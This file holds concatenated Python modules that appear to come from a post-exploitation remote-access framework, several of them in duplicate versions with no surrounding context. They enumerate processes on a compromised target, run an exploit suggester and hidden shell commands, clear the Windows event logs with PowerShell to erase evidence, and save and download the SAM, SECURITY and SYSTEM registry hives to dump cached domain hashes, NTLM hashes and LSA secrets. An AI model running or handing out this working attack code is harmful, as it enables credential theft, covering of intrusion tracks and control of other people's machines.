def run(self, args):
if self.client.is_windows():
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
outputlist=self.client.conn.modules["pupwinutils.processes"].get_current_pid()
outputlist=obtain(outputlist) #pickle the list of proxy objects with obtain is really faster
for out in outputlist:
self.log('%s: %s' % (out, outputlist[out]))
return # quit
elif self.client.is_android():
all_process = shell_exec(self.client, "ps")
elif self.client.is_darwin():
all_process = shell_exec(self.client, "ps aux")
else:
all_process = shell_exec(self.client, "ps -aux")
# used for posix system
pid=self.client.conn.modules['os'].getpid()
for process in all_process.split('\n'):
p = re.split(r' +', process)
if len(p)>1:
pi = p[1]
if pi == str(pid):
self.log("%s"%(process))
break
def run(self, args):
if self.client.is_windows():
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
outputlist = self.client.conn.modules[
"pupwinutils.processes"].enum_processes()
outputlist = obtain(
outputlist
) #pickle the list of proxy objects with obtain is really faster
columns = ['username', 'pid', 'arch', 'exe']
if args.all:
columns = [
'username', 'pid', 'arch', 'name', 'exe', 'cmdline',
'status'
]
for dic in outputlist:
dic["cmdline"] = ' '.join(dic['cmdline'][1:])
else:
for dic in outputlist:
if 'exe' in dic and not dic[
'exe'] and 'name' in dic and dic['name']:
dic['exe'] = dic['name']
if 'username' in dic and dic['username'] is None:
dic['username'] = ""
self.rawlog(self.formatter.table_format(outputlist, wl=columns))
elif self.client.is_android():
self.log(shell_exec(self.client, "ps"))
elif self.client.is_darwin():
self.log(shell_exec(self.client, "ps aux"))
else:
self.log(shell_exec(self.client, "ps -aux"))
def run(self, args):
if self.client.is_windows():
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
outputlist = self.client.conn.modules[
"pupwinutils.processes"].get_current_ppid()
outputlist = obtain(
outputlist
) #pickle the list of proxy objects with obtain is really faster
for out in outputlist:
self.log('%s: %s' % (out, outputlist[out]))
return # quit
elif self.client.is_android():
all_process = shell_exec(self.client, "ps")
elif self.client.is_darwin():
all_process = shell_exec(self.client, "ps aux")
else:
all_process = shell_exec(self.client, "ps -aux")
# used for posix system
ppid = self.client.conn.modules['os'].getppid()
for process in all_process.split('\n'):
p = re.split(r' +', process)
if len(p) > 1:
pid = p[1]
if pid == str(ppid):
self.log("%s" % (process))
break
def run(self, args):
if self.client.is_windows():
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
outputlist=self.client.conn.modules["pupwinutils.processes"].enum_processes()
outputlist=obtain(outputlist) #pickle the list of proxy objects with obtain is really faster
columns=['username', 'pid', 'arch', 'exe']
if args.all:
columns=['username', 'pid', 'arch', 'name', 'exe', 'cmdline', 'status']
for dic in outputlist:
for c in columns:
if c in dic and dic[c] is None:
dic[c]=""
dic["cmdline"]=' '.join(dic['cmdline'][1:])
else:
for dic in outputlist:
if 'exe' in dic and not dic['exe'] and 'name' in dic and dic['name']:
dic['exe']=dic['name']
if 'username' in dic and dic['username'] is None:
dic['username']=""
self.rawlog(self.formatter.table_format(outputlist, wl=columns))
elif self.client.is_android():
self.log(shell_exec(self.client, "ps"))
elif self.client.is_darwin():
self.log(shell_exec(self.client, "ps aux"))
else:
self.log(shell_exec(self.client, "ps -aux"))
def run(self, args):
if args.update:
self.execute_python_file('--update')
return
if self.client.is_windows():
xls_file = self.find_xls_database(os.path.join(ROOT, "external", "Windows-Exploit-Suggester"))
if not xls_file:
self.error('no windows database file found. Please connect the server to internet and launch the --update command')
return
# write systeminfo to the tmp directory
random_file = ''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])
full_path = os.path.join(tempfile.gettempdir(), random_file)
f = open(full_path, 'w')
f.write(shell_exec(self.client, "systeminfo").encode('utf-8', 'ignore'))
f.close()
self.success("Running Windows-Exploit-Suggester python script locally")
self.execute_python_file('--database %s --systeminfo %s' % (xls_file, full_path))
os.remove(full_path)
elif self.client.is_linux():
self.success("Running linux-exploit-suggester sh script on the target with the {0} shell on the target...".format(args.shell))
if self.client.conn.modules.os.path.isfile(args.shell) == False:
self.error("{0} does not exist on the target's system!".format(args.shell))
self.error("You have to choose a valid shell")
return -1
code = open(os.path.join(ROOT, "external", "linux-exploit-suggester", "linux-exploit-suggester.sh"), 'r').read()
p = self.client.conn.modules.subprocess.Popen(code, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, executable=args.shell)
output, err = p.communicate()
print output
def run(self, args):
if args.update:
self.execute_python_file('--update')
return
if self.client.is_windows():
xls_file = self.find_xls_database(os.path.join(ROOT, "external", "Windows-Exploit-Suggester"))
if not xls_file:
self.error('no windows database file found. Please connect the server to internet and launch the --update command')
return
# write systeminfo to the tmp directory
random_file = ''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])
full_path = os.path.join(tempfile.gettempdir(), random_file)
f = open(full_path, 'w')
f.write(shell_exec(self.client, "systeminfo").encode('utf-8', 'ignore'))
f.close()
self.success("Running Windows-Exploit-Suggester python script locally")
self.execute_python_file('--database %s --systeminfo %s' % (xls_file, full_path))
os.remove(full_path)
elif self.client.is_linux():
self.success("Running linux-exploit-suggester sh script on the target with the {0} shell on the target...".format(args.shell))
if not self.client.conn.modules.os.path.isfile(args.shell):
self.error("{0} does not exist on the target's system!".format(args.shell))
self.error("You have to choose a valid shell")
return -1
code = open(os.path.join(ROOT, "external", "linux-exploit-suggester", "linux-exploit-suggester.sh"), 'r').read()
p = self.client.conn.modules.subprocess.Popen(code, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, executable=args.shell)
output, err = p.communicate()
print output
def run(self, args):
if not args.hide:
self.log(shell_exec(self.client, args.argument, shell=args.shell, encoding=args.codepage))
elif args.hide and self.client.is_windows():
try:
self.client.load_package("pupwinutils.processes")
p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.argument)
pid=p.pid
self.success("Process created with pid %s" % p.pid)
except Exception, e:
self.error("Error creating the process: %s" % e)
def run(self, args):
if self.client.desc['intgty_lvl'] != "High":
self.error('You need admin privileges to clear logs')
return
powershell_cmd = '$events_logs="application","security","setup","system"; ForEach ($event in $events_logs) { [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog("$event")}'
output = shell_exec(self.client, powershell_cmd, shell='powershell.exe')
if not output:
self.success('Logs deleted successfully')
else:
self.error('An error occured: \n%s' % output)
def run(self, args):
if not args.hide:
self.log(shell_exec(self.client, args.argument, shell=args.shell))
else:
try:
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
p = self.client.conn.modules["pupwinutils.processes"].start_hidden_process(args.hide)
pid = p.pid
self.success("Process created with pid %s" % p.pid)
except Exception, e:
self.error("Error creating the process: %s" % e)
def run(self, args):
if self.client.desc['intgty_lvl'] != "High":
self.error('You need admin privileges to clear logs')
return
powershell_cmd = '$events_logs="application","security","setup","system"; ForEach ($event in $events_logs) { [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog("$event")}'
output = shell_exec(self.client,
powershell_cmd,
shell='powershell.exe')
if not output:
self.success('Logs deleted successfully')
else:
self.error('An error occured: \n%s' % output)
def run(self, args):
if not args.hide:
self.log(shell_exec(self.client, args.argument, shell=args.shell))
elif args.hide and self.client.is_windows():
try:
self.client.load_package("pupwinutils.processes")
p = self.client.conn.modules[
'pupwinutils.processes'].start_hidden_process(
args.argument)
pid = p.pid
self.success("Process created with pid %s" % p.pid)
except Exception, e:
self.error("Error creating the process: %s" % e)
def run(self, args):
if not args.hide:
log = shell_exec(self.client, args.argument, shell=args.shell)
self.log(log)
if args.log:
with open(args.log, 'wb') as output:
output.write(log)
else:
try:
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.argument)
pid=p.pid
self.success("Process created with pid %s" % p.pid)
except Exception, e:
self.error("Error creating the process: %s" % e)
def run(self, args):
if not args.hide:
log = shell_exec(self.client, args.argument, shell=args.shell)
self.log(log)
if args.log:
with open(args.log, 'wb') as output:
output.write(log)
else:
try:
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
p = self.client.conn.modules[
'pupwinutils.processes'].start_hidden_process(args.hide)
pid = p.pid
self.success("Process created with pid %s" % p.pid)
except Exception, e:
self.error("Error creating the process: %s" % e)
def run(self, args):
# First, we download the hives...
rep=os.path.join("data","downloads",self.client.short_name(),"hives")
try:
os.makedirs(rep)
except Exception:
pass
self.info("saving SYSTEM hives in %TEMP%...")
for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"):
self.info("running %s..." % cmd)
self.log(shell_exec(self.client, cmd))
self.success("hives saved!")
remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%")
self.info("downloading SYSTEM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM"))
self.info("downloading SECURITY hive...")
download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY"))
self.info("downloading SAM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM"))
self.success("hives downloaded to %s" % rep)
# Cleanup
self.info("cleaning up saves...")
try:
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
self.success("saves deleted")
except Exception as e:
self.warning("error deleting temporary files: %s"%str(e))
# Time to run creddump!
# HiveFileAddressSpace - Volatilty
sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM"))
secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY"))
samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM"))
#detect windows version
is_vista=False
try:
if self.client.conn.modules['sys'].getwindowsversion()[0] >=6:
is_vista=True
self.info("windows > vista detected")
else:
self.info("windows < vista detected")
except:
self.warning("windows version couldn't be determined. supposing vista=False")
# Print the results
self.info("dumping cached domain passwords...")
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'),
d.lower(), dn.lower()))
self.info("dumping LM and NT hashes...")
bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr,bootkey)
for user in get_user_keys(samaddr):
lmhash, nthash = get_user_hashes(user,hbootkey)
if not lmhash: lmhash = empty_lm
if not nthash: nthash = empty_nt
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16),
lmhash.encode('hex'), nthash.encode('hex')))
self.info("dumping lsa secrets...")
secrets = get_file_secrets(os.path.join(rep, "SYSTEM"),
os.path.join(rep, "SECURITY"), is_vista)
if not secrets:
self.error("unable to read LSA secrets, perhaps the hives are corrupted")
return
for key in secrets:
self.log(key)
self.log(self.dump(secrets[key], length=16))
# The End! (hurrah)
self.success("dump was successfull!")
def windows(self):
# First, we download the hives...
#detect windows version
is_vista = False
try:
if self.client.conn.modules['sys'].getwindowsversion()[0] >= 6:
is_vista = True
self.info("windows > vista detected")
else:
self.info("windows < vista detected")
except:
self.warning(
"windows version couldn't be determined. supposing vista=False"
)
self.success("saving SYSTEM hives in %TEMP%...")
cmds = ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM",
"reg save HKLM\\SECURITY %TEMP%/SECURITY",
"reg save HKLM\\SAM %TEMP%/SAM")
if is_vista:
cmds = (x + ' /y' for x in cmds)
for cmd in cmds:
self.info("running %s..." % cmd)
self.log(shell_exec(self.client, cmd))
self.success("hives saved!")
remote_temp = self.client.conn.modules['os.path'].expandvars("%TEMP%")
self.info("downloading SYSTEM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"),
os.path.join(self.rep, "SYSTEM"))
self.info("downloading SECURITY hive...")
download(self.client.conn, ntpath.join(remote_temp, "SECURITY"),
os.path.join(self.rep, "SECURITY"))
self.info("downloading SAM hive...")
download(self.client.conn, ntpath.join(remote_temp, "SAM"),
os.path.join(self.rep, "SAM"))
self.success("hives downloaded to %s" % self.rep)
# Cleanup
self.success("cleaning up saves...")
try:
self.client.conn.modules.os.remove(
ntpath.join(remote_temp, "SYSTEM"))
self.client.conn.modules.os.remove(
ntpath.join(remote_temp, "SECURITY"))
self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
self.success("saves deleted")
except Exception as e:
self.warning("error deleting temporary files: %s" % str(e))
# Time to run creddump!
hashes = []
# HiveFileAddressSpace - Volatilty
sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM"))
secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY"))
samaddr = HiveFileAddressSpace(os.path.join(self.rep, "SAM"))
# Print the results
self.success("dumping cached domain passwords...")
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
self.log("%s:%s:%s:%s" %
(u.lower(), h.encode('hex'), d.lower(), dn.lower()))
hashes.append({
'Login':
u.lower(),
'Hash':
"%s:%s:%s" % (h.encode('hex'), d.lower(), dn.lower()),
'Category':
'MSCACHE hash',
'CredType':
'hash'
})
self.success("dumping LM and NT hashes...")
bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr, bootkey)
for user in get_user_keys(samaddr):
lmhash, nthash = get_user_hashes(user, hbootkey)
if not lmhash: lmhash = empty_lm
if not nthash: nthash = empty_nt
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(
user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
hashes.append({
'Login':
get_user_name(user),
'Hash':
"%s:%s" % (lmhash.encode('hex'), nthash.encode('hex')),
'Category':
'NTLM hash',
'CredType':
'hash'
})
self.db.add(hashes)
self.success("Hashes stored on the database")
self.success("dumping lsa secrets...")
secrets = get_file_secrets(os.path.join(self.rep, "SYSTEM"),
os.path.join(self.rep, "SECURITY"),
is_vista)
if not secrets:
self.error(
"unable to read LSA secrets, perhaps the hives are corrupted")
return
for key in secrets:
self.log(key)
self.log(self.dump(secrets[key], length=16))
# The End! (hurrah)
self.success("dump was successfull!")
def run(self, args):
if self.client.is_windows():
self.stdout.write(
self.client.conn.modules['pupwinutils.drives'].list_drives()
)
elif self.client.is_linux():
tier1 = ( 'network', 'fuse', 'dm', 'block' )
rmount = self.client.conn.modules['mount']
ros = self.client.conn.modules['os']
mountinfo = obtain(rmount.mounts())
uid = ros.getuid()
gid = ros.getgid()
option_colors = {
'rw': 'yellow',
'nosuid': 'green',
'nodev': 'green',
'noexec': 'green',
'uid': {
'0': 'green',
str(uid): 'red'
},
'gid': {
'0': 'green',
str(gid): 'red'
},
'ro': 'green',
'user_id': {
'0':'green',
str(uid): 'red'
},
'group_id': {
'0':'green',
str(gid): 'red'
},
'allow_other': 'yellow',
'xattr': 'yellow',
'acl': 'yellow',
'username': '******',
'domain': 'red',
'forceuid': 'yellow',
'forcegid': 'yellow',
'addr': 'red',
'unix': 'red'
}
def colorize_option(option):
if len(option) > 1:
k, v = option
else:
k = option[0]
v = None
color = option_colors.get(k)
if color:
if type(color) == dict:
if v in color:
return colorize(
'='.join([x for x in [k, v] if x]), color.get(v)
)
else:
return '='.join([x for x in [k, v] if x])
else:
return colorize(
'='.join([x for x in [k, v] if x]), color
)
else:
return '='.join([x for x in [k, v] if x])
output = []
for fstype in mountinfo.iterkeys():
if fstype in tier1:
continue
output.append('{}:'.format(colorize(fstype, 'yellow')))
dst_max = max([len(x['dst']) for x in mountinfo[fstype]])
fsname_max = max([len(x['fsname']) for x in mountinfo[fstype]])
free_max = max([len(x['hfree']) if x['total'] else 0 for x in mountinfo[fstype]])
for info in mountinfo[fstype]:
fmt = '{{:<{}}} {{:<{}}} {{:>{}}} {{}}'.format(
dst_max, fsname_max, ( free_max + 3 + 4 ) if free_max else 0
)
output.append(
fmt.format(
info['dst'], info['fsname'], (
colorize(
('{{:>3}}% ({{:>{}}})'.format(free_max)).format(
info['pused'], info['hfree']
),
'white' if info['pused'] < 90 else 'yellow'
)
) if info['total'] else '',
','.join([colorize_option(option) for option in info['options']])
)
)
output.append('')
for fstype in tier1:
if not fstype in mountinfo:
continue
src_max = max([len(x['src']) for x in mountinfo[fstype]])
dst_max = max([len(x['dst']) for x in mountinfo[fstype]])
fsname_max = max([len(x['fsname']) for x in mountinfo[fstype]])
free_max = max([len(x['hfree']) if x['total'] else 0 for x in mountinfo[fstype]])
output.append('{}:'.format(colorize(fstype, 'green')))
for info in mountinfo[fstype]:
fmt = '{{:<{}}} {{:<{}}} {{:<{}}} {{:>{}}} {{}}'.format(
dst_max, src_max, fsname_max, ( free_max + 3 + 4 ) if free_max else 0
)
output.append(
fmt.format(
info['dst'], info['src'], info['fsname'], (
colorize(
('{{:>3}}% ({{:>{}}})'.format(free_max)).format(
info['pused'], info['hfree']
),
'white' if info['pused'] < 90 else 'yellow'
)
) if info['total'] else '',
','.join([colorize_option(option) for option in info['options']])
)
)
output.append('')
self.stdout.write('\n'.join(output))
elif self.client.is_darwin():
self.log(shell_exec(self.client, 'df -H'))
def run(self, args):
if self.client.is_windows():
self.stdout.write(
self.client.conn.modules['pupwinutils.drives'].list_drives()
)
elif self.client.is_linux():
tier1 = ( 'network', 'fuse', 'dm', 'block' )
rmount = self.client.conn.modules['mount']
ros = self.client.conn.modules['os']
mountinfo = rmount.mounts()
uid = ros.getuid()
gid = ros.getgid()
option_colors = {
'rw': 'yellow',
'nosuid': 'green',
'nodev': 'green',
'noexec': 'green',
'uid': {
'0': 'green',
str(uid): 'red'
},
'gid': {
'0': 'green',
str(gid): 'red'
},
'ro': 'green',
'user_id': {
'0':'green',
str(uid): 'red'
},
'group_id': {
'0':'green',
str(gid): 'red'
},
'allow_other': 'yellow',
'xattr': 'yellow',
'acl': 'yellow',
'username': '******',
'domain': 'red',
'forceuid': 'yellow',
'forcegid': 'yellow',
'addr': 'red',
'unix': 'red'
}
def colorize_option(option):
if len(option) > 1:
k, v = option
else:
k = option[0]
v = None
color = option_colors.get(k)
if color:
if type(color) == dict:
if v in color:
return colorize(
'='.join([x for x in [k, v] if x]), color.get(v)
)
else:
return '='.join([x for x in [k, v] if x])
else:
return colorize(
'='.join([x for x in [k, v] if x]), color
)
else:
return '='.join([x for x in [k, v] if x])
output = []
for fstype in mountinfo.iterkeys():
if fstype in tier1:
continue
output.append('{}:'.format(colorize(fstype, 'yellow')))
dst_max = max([len(x.dst) for x in mountinfo[fstype]])
fsname_max = max([len(x.fsname) for x in mountinfo[fstype]])
free_max = max([len(x.hfree) if x.total else 0 for x in mountinfo[fstype]])
for info in mountinfo[fstype]:
fmt = '{{:<{}}} {{:<{}}} {{:>{}}} {{}}'.format(
dst_max, fsname_max, ( free_max + 3 + 4 ) if free_max else 0
)
output.append(
fmt.format(
info.dst, info.fsname, (
colorize(
('{{:>3}}% ({{:>{}}})'.format(free_max)).format(
info.pused, info.hfree
),
'white' if info.pused < 90 else 'yellow'
)
) if info.total else '',
','.join([colorize_option(option) for option in info.options])
)
)
output.append('')
for fstype in tier1:
if not fstype in mountinfo:
continue
src_max = max([len(x.src) for x in mountinfo[fstype]])
dst_max = max([len(x.dst) for x in mountinfo[fstype]])
fsname_max = max([len(x.fsname) for x in mountinfo[fstype]])
free_max = max([len(x.hfree) if x.total else 0 for x in mountinfo[fstype]])
output.append('{}:'.format(colorize(fstype, 'green')))
for info in mountinfo[fstype]:
fmt = '{{:<{}}} {{:<{}}} {{:<{}}} {{:>{}}} {{}}'.format(
dst_max, src_max, fsname_max, ( free_max + 3 + 4 ) if free_max else 0
)
output.append(
fmt.format(
info.dst, info.src, info.fsname, (
colorize(
('{{:>3}}% ({{:>{}}})'.format(free_max)).format(
info.pused, info.hfree
),
'white' if info.pused < 90 else 'yellow'
)
) if info.total else '',
','.join([colorize_option(option) for option in info.options])
)
)
output.append('')
self.stdout.write('\n'.join(output))
elif self.client.is_darwin():
self.log(shell_exec(self.client, 'df -H'))
def run(self, args):
self.log(shell_exec(self.client, args.argument, shell=args.shell))
def run(self, args): self.log(shell_exec(self.client, args.argument, shell=args.shell))